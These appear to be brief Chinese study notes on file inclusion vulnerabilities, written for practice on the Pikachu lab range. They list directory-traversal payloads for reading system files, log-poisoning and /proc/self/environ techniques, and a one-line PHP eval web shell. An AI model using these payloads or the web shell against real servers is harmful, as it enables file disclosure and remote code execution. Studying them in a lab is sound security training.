文件包含漏洞的
考虑常用的几种包含方式为
- 同目录包含
file=.htaccess
- 目录遍历
?file=../../../../../../../../../var/lib/locate.db
- 日志注入
?file=../../../../../../../../../var/log/apache/error.log
- 利用
/proc/self/environ
其中日志可以使用SSH日志或者Web日志等多种日志来源测试
一句话木马 <php @eval($_POST[pp]);?>
打开pikachu靶场
查看上传的路径在什么地方
比较一下 插在什么地方
127.0.0.1/pikachu-master/vul/unsafeupload/uploads/22/04/24/6182166264bce3e286a273114413.jpg